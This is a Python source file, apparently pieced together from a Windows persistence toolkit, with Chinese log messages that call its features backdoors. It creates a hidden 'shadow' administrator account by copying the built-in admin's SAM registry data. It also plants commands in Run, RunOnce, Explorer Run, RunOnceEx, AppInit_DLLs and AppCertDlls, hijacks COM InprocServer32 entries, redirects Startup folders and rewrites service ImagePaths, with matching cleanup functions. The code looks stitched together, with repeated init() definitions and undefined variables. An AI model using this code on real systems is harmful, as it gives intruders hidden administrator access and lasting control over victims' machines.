def set_account(username,password):
create_accout(username,password)
#保存账号的类型
account_type = get_account_num(username)
root = pyregedit.HKEY_LOCAL_MACHINE
path = r"SAM\SAM\Domains\Account\Users\\"+'00000'+str(hex(account_type))[2:]
reg = pyregedit.RegEdit(root,path)
#判断键是否存在
if reg.check_key():
admin_F = get_admin_account_value()
V = reg.get_value("V")[0]
# ForcePasswordReset = reg.get_value("ForcePasswordReset")[0]
# SupplementalCredentials = reg.get_value("SupplementalCredentials")[0]
else:
logger.error("用户不存在")
return
delete_accout(username)
#恢复注册表
reg.create_value("F",pyregedit.REG_BINARY,admin_F)
reg.create_value("V",pyregedit.REG_BINARY,V)
# reg.create_value("ForcePasswordReset",pyregedit.REG_BINARY,ForcePasswordReset)
# reg.create_value("SupplementalCredentials",pyregedit.REG_BINARY,SupplementalCredentials)
path = r"SAM\SAM\Domains\Account\Users\Names\\" + username
reg = pyregedit.RegEdit(root, path)
reg.create_value("", account_type, "".encode())
logger.info('影子账号创建成功')
def clear_system_startup_folder():
root = pyregedit.HKEY_LOCAL_MACHINE
path = r"Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"
reg = pyregedit.RegEdit(root, path)
if reg.check_key():
try:
reg.delete_value('Startup')
logger.info('User Shell Folders Startup 清除成功')
except:
logger.error('User Shell Folders Startup 清除失败')
else:
logger.error('需要管理员权限!')
return
path = r"Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
reg = pyregedit.RegEdit(root, path)
if reg.check_key():
try:
reg.delete_value('Startup')
logger.info('Shell Folders Startup 清除成功')
except:
logger.error('Shell Folders Startup 清除失败')
else:
logger.error('需要管理员权限!')
return
def init():
root = pyregedit.HKEY_CURRENT_USER
path = r"Software\Classes\CLSID\{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7}"
reg = pyregedit.RegEdit(root, path)
if reg.check_key():
path = r"Software\Classes\CLSID\{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7}\InprocServer32"
reg = pyregedit.RegEdit(root, path)
if reg.check_key():
pass
else:
reg.create_key()
logger.info('创建了InprocServer32')
else:
reg.create_key()
path = r"Software\Classes\CLSID\{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7}\InprocServer32"
reg = pyregedit.RegEdit(root, path)
reg.create_key()
logger.info('创建了InprocServer32')
return reg
def init():
root = pyregedit.HKEY_CURRENT_USER
path = r"Software\Classes\CLSID\{42aedc87-2188-41fd-b9a3-0c966feabec1}"
reg = pyregedit.RegEdit(root, path)
if reg.check_key():
path = r"Software\Classes\CLSID\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InprocServer32"
reg = pyregedit.RegEdit(root, path)
if reg.check_key():
pass
else:
reg.create_key()
logger.info('创建了InprocServer32')
else:
reg.create_key()
path = r"Software\Classes\CLSID\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InprocServer32"
reg = pyregedit.RegEdit(root, path)
reg.create_key()
logger.info('创建了InprocServer32')
return reg
def clear_AppCertDlls():
root = pyregedit.HKEY_LOCAL_MACHINE
path = r"System\CurrentControlSet\Control\Session Manager\AppCertDlls"
reg = pyregedit.RegEdit(root, path)
#判断键是否存在
if reg.check_key():
reg.delete_current_key()
logger.info('清除')
else:
logger.info('AppCertDlls键不存在')
def get_admin_account_value():
root = pyregedit.HKEY_LOCAL_MACHINE
path = r"SAM\SAM\Domains\Account\Users\000001F4"
reg = pyregedit.RegEdit(root,path)
#判断键是否存在
if reg.check_key():
F = reg.get_value("F")[0]
# V = reg.get_value("V")[0]
return F
else:
return
def clear_account(username):
account_type = get_account_num(username)
if not account_type :
logger.info("未植入影子后门")
return
root = pyregedit.HKEY_LOCAL_MACHINE
path = r"SAM\SAM\Domains\Account\Users\Names\\" + username
reg = pyregedit.RegEdit(root, path)
try:
reg.delete_current_key()
except:
pass
path = r"SAM\SAM\Domains\Account\Users\\"+'00000'+str(hex(account_type))[2:]
reg = pyregedit.RegEdit(root, path)
try:
reg.delete_current_key()
except:
pass
logger.info("影子账号清除成功")
def clear_AppInit_DLLs():
root = pyregedit.HKEY_LOCAL_MACHINE
path = r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows"
reg = pyregedit.RegEdit(root,path)
#判断键是否存在
if reg.check_key():
reg.create_value('AppInit_DLLs', pyregedit.REG_SZ, "")
reg.create_value('LoadAppInit_DLLs', pyregedit.REG_DWORD, 0x0)
logger.info('清除')
else:
logger.info('需要管理员权限!')
return
def get_account_num(username):
root = pyregedit.HKEY_LOCAL_MACHINE
path = r"SAM\SAM\Domains\Account\Users\Names\\"+username
reg = pyregedit.RegEdit(root,path)
#判断键是否存在
if reg.check_key():
d = reg.get_value("")[1]
return d
else:
#创建键
# key = reg.create_key()
pass
def clear_user():
root = pyregedit.HKEY_CURRENT_USER
path = r"Software\Microsoft\Windows\CurrentVersion\Run"
reg = pyregedit.RegEdit(root, path)
#判断键是否存在
if reg.check_key():
try:
if reg.delete_value(value_name):
logger.info('Run 删除成功')
else:
logger.error('没有植入Run 后门')
except:
logger.error('Run 删除失败')
else:
pass
path = r"Software\Microsoft\Windows\CurrentVersion\RunOnce"
reg = pyregedit.RegEdit(root, path)
if reg.delete_value(value_name):
logger.info('RunOnce 删除成功')
path = r"Software\Microsoft\Windows\CurrentVersion\RunServices"
reg = pyregedit.RegEdit(root, path)
if reg.check_key():
try:
reg.delete_current_key()
logger.info('RunServices 删除成功')
except:
logger.error('RunServices 删除失败')
path = r"Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"
reg = pyregedit.RegEdit(root, path)
if reg.check_key():
try:
reg.delete_current_key()
logger.info('RunServicesOnce 删除成功')
except:
logger.error('RunServicesOnce 删除失败')
def set_user_startup_folder_shell(startup_path):
root = pyregedit.HKEY_CURRENT_USER
path = r"Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
reg = pyregedit.RegEdit(root, path)
if reg.check_key():
pass
else:
reg.create_key()
try:
reg.create_value('Startup', pyregedit.REG_SZ, startup_path)
logger.info('Shell Folders Startup 修改成功')
except:
logger.error('Shell Folders Startup 修改失败')
def set_system_startup_folder_shell(startup_path):
root = pyregedit.HKEY_LOCAL_MACHINE
path = r"Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
reg = pyregedit.RegEdit(root, path)
if reg.check_key():
pass
else:
logger.error('需要管理员权限!')
return
try:
reg.create_value('Startup', pyregedit.REG_SZ, startup_path)
logger.info('Shell Folders Startup 修改成功')
except:
logger.error('Shell Folders Startup 修改失败')
def clear_user_startup_folder():
value = r'%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup'
root = pyregedit.HKEY_CURRENT_USER
path = r"Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"
reg = pyregedit.RegEdit(root, path)
if reg.check_key():
try:
reg.create_value('Startup', pyregedit.REG_SZ, value)
logger.info('User Shell Folders Startup 清除成功')
except:
logger.error('User Shell Folders Startup 清除失败')
else:
logger.info('User Shell Folders 键值不存在')
path = r"Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
reg = pyregedit.RegEdit(root, path)
if reg.check_key():
try:
reg.create_value('Startup', pyregedit.REG_SZ, value)
logger.info('Shell Folders Startup 清除成功')
except:
logger.error('Shell Folders Startup 清除失败')
else:
logger.info('Shell Folders 键值不存在')
def set_user_runonce(cmd):
root = pyregedit.HKEY_CURRENT_USER
path = r"Software\Microsoft\Windows\CurrentVersion\RunOnce"
reg = pyregedit.RegEdit(root, path)
if reg.check_key():
try:
reg.create_value(value_name, pyregedit.REG_SZ, cmd)
logger.info('插入注册表成功')
except:
logger.error('插入注册表失败')
else:
#创建键
logger.error('RunOnce 键不存在')
exit(0)
def clear_com_explorer_Hijack():
root = pyregedit.HKEY_CURRENT_USER
path = r"Software\Classes\CLSID\{42aedc87-2188-41fd-b9a3-0c966feabec1}"
reg = pyregedit.RegEdit(root, path)
if reg.check_key():
try:
reg.delete_sub_key('InprocServer32')
reg.delete_current_key()
logger.info('清除成功')
except:
logger.error('清除失败')
else:
logger.info('该后门没有植入')
return
def set_AppInit_DLLs(cmd):
root = pyregedit.HKEY_LOCAL_MACHINE
path = r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows"
reg = pyregedit.RegEdit(root,path)
#判断键是否存在
if reg.check_key():
try:
reg.create_value('AppInit_DLLs', pyregedit.REG_SZ, cmd)
reg.create_value('LoadAppInit_DLLs', pyregedit.REG_DWORD, 0x01)
logger.info('插入注册表成功')
except:
logger.error('插入注册表失败')
else:
logger.info('需要管理员权限!')
return
def set_user_RunServicesOnce(cmd):
root = pyregedit.HKEY_CURRENT_USER
path = r"Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"
reg = pyregedit.RegEdit(root, path)
if reg.check_key():
pass
else:
reg.create_key()
logger.error('创建 RunServicesOnce 键值')
try:
reg.create_value(value_name, pyregedit.REG_SZ, cmd)
logger.info('插入注册表成功')
except:
logger.error('插入注册表失败')
def set_system_Explorer(cmd):
root = pyregedit.HKEY_LOCAL_MACHINE
path = r"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"
reg = pyregedit.RegEdit(root, path)
if reg.check_key():
pass
else:
reg.create_key()
logger.error('创建 Explorer\Run 键值')
try:
reg.create_value(value_name, pyregedit.REG_SZ, cmd)
logger.info('插入注册表成功')
except:
logger.error('插入注册表失败')
def set_system_RunOnceEx_dll(cmd):
root = pyregedit.HKEY_LOCAL_MACHINE
path = r"Software\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend"
reg = pyregedit.RegEdit(root, path)
if reg.check_key():
pass
else:
reg.create_key()
logger.error(r'创建 RunOnceEx\0001\Depend 键值')
try:
reg.create_value(value_name, pyregedit.REG_SZ, cmd)
logger.info('插入注册表成功')
except:
logger.error('插入注册表失败')
def set_AppCertDlls(cmd):
root = pyregedit.HKEY_LOCAL_MACHINE
path = r"System\CurrentControlSet\Control\Session Manager\AppCertDlls"
reg = pyregedit.RegEdit(root, path)
#判断键是否存在
if reg.check_key():
pass
else:
#创建键
reg.create_key()
logger.info('创建AppCertDlls键')
try:
reg.create_value('Default', pyregedit.REG_SZ, cmd)
logger.info('插入注册表成功')
except:
logger.error('插入注册表失败')
def set_user_Explorer(cmd):
root = pyregedit.HKEY_CURRENT_USER
path = r"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"
reg = pyregedit.RegEdit(root, path)
if reg.check_key():
pass
else:
try:
reg.create_key()
logger.info('创建 Explorer\Run 键值')
except:
logger.error('需要管理员权限')
return
try:
reg.create_value(value_name, pyregedit.REG_SZ, cmd)
logger.info('插入注册表成功')
except:
logger.error('插入注册表失败')
def clear_com_Hijack():
root = pyregedit.HKEY_CURRENT_USER
path = r"Software\Classes\CLSID\{b5f8350b-0548-48b1-a6ee-88bd00b4a5e7}"
reg = pyregedit.RegEdit(root, path)
if reg.check_key():
try:
reg.delete_sub_key('InprocServer32')
reg.delete_current_key()
if os.path.isdir(defaultpath):
shutil.rmtree(defaultpath)
else:
pass
logger.info('清除成功')
except:
logger.error('清除失败')
else:
logger.info('该后门没有植入')
return
def set_system(cmd):
root = pyregedit.HKEY_LOCAL_MACHINE
path = r"Software\Microsoft\Windows\CurrentVersion\Run"
reg = pyregedit.RegEdit(root, path)
#判断键是否存在
if reg.check_key():
#获取键(可用于其他操作)
key = reg.get_key()
else:
#创建键
logger.error('需要管理员权限!')
return
try:
reg.create_value(value_name, pyregedit.REG_SZ, cmd)
logger.info('插入注册表成功')
except:
logger.error('插入注册表失败')
def set_reg_service(cmd, service):
root = pyregedit.HKEY_LOCAL_MACHINE
path = r"SYSTEM\CurrentControlSet\Services\\" + service
reg = pyregedit.RegEdit(root, path)
#判断键是否存在
if reg.check_key():
#获取键(可用于其他操作)
key = reg.get_key()
else:
logger.error(service + '服务不存在')
return
try:
# reg.create_value('ErrorControl',pyregedit.REG_DWORD,0x01)
# reg.create_value('ObjectName',pyregedit.REG_SZ,'LocalSystem')
reg.create_value('Start', pyregedit.REG_DWORD, 0x02)
reg.create_value('Type', pyregedit.REG_DWORD, 0x10)
reg.create_value('ImagePath', pyregedit.REG_EXPAND_SZ, cmd)
logger.info('修改服务成功')
except Exception as e:
logger.error('修改服务失败: ' + str(e))
def HKLM_init():
root = pyregedit.HKEY_LOCAL_MACHINE
path = r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
reg = pyregedit.RegEdit(root, path)
return reg
def clear_system():
root = pyregedit.HKEY_LOCAL_MACHINE
path = r"Software\Microsoft\Windows\CurrentVersion\Run"
reg = pyregedit.RegEdit(root, path)
#判断键是否存在
if reg.check_key():
try:
if reg.delete_value(value_name):
logger.info('Run 删除成功')
else:
logger.error('没有植入Run 后门')
except:
logger.error('Run 删除失败')
else:
logger.error('Run 需要管理员权限!')
return
path = r"Software\Microsoft\Windows\CurrentVersion\RunOnce"
reg = pyregedit.RegEdit(root, path)
if reg.delete_value(value_name):
logger.info('RunOnce 删除成功')
path = r"Software\Microsoft\Windows\CurrentVersion\RunServices"
reg = pyregedit.RegEdit(root, path)
if reg.check_key():
try:
reg.delete_current_key()
logger.info('RunServices 删除成功')
except:
logger.error('RunServices 删除失败')
path = r"Software\Microsoft\Windows\CurrentVersion\RunServicesOnce"
reg = pyregedit.RegEdit(root, path)
if reg.check_key():
try:
reg.delete_current_key()
logger.info('RunServicesOnce 删除成功')
except:
logger.error('RunServicesOnce 删除失败')
path = r"Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"
reg = pyregedit.RegEdit(root, path)
if reg.check_key():
try:
reg.delete_current_key()
logger.info('Explorer\\Run 删除成功')
except:
logger.error('Explorer\\Run 删除失败')
else:
logger.error('没有植入HKLM Explorer\\Run 后门')
path = r"Software\Microsoft\Windows\CurrentVersion\RunOnceEx\0001"
reg = pyregedit.RegEdit(root, path)
if reg.check_key():
try:
try:
reg.delete_sub_key('Depend')
logger.info('RunOnceEx\\0001\\Depend 删除成功')
except:
pass
reg.delete_current_key()
logger.info('RunOnceEx\\0001 删除成功')
except:
logger.error('RunOnceEx\\0001 删除失败')
else:
logger.error('没有植入 RunOnceEx\\0001 后门')
root = pyregedit.HKEY_CURRENT_USER
path = r"Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"
reg = pyregedit.RegEdit(root, path)
if reg.check_key():
try:
reg.delete_current_key()
logger.info('Explorer\\Run 删除成功')
except:
logger.error('Explorer\\Run 删除失败')
else:
logger.error('没有植入HKCU Explorer\\Run 后门')
def init():
root = pyregedit.HKEY_LOCAL_MACHINE
path = r"SOFTWARE\Microsoft\NetSh"
reg = pyregedit.RegEdit(root, path)
return reg
def init():
root = pyregedit.HKEY_CURRENT_USER
path = r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
reg = pyregedit.RegEdit(root, path)
return reg
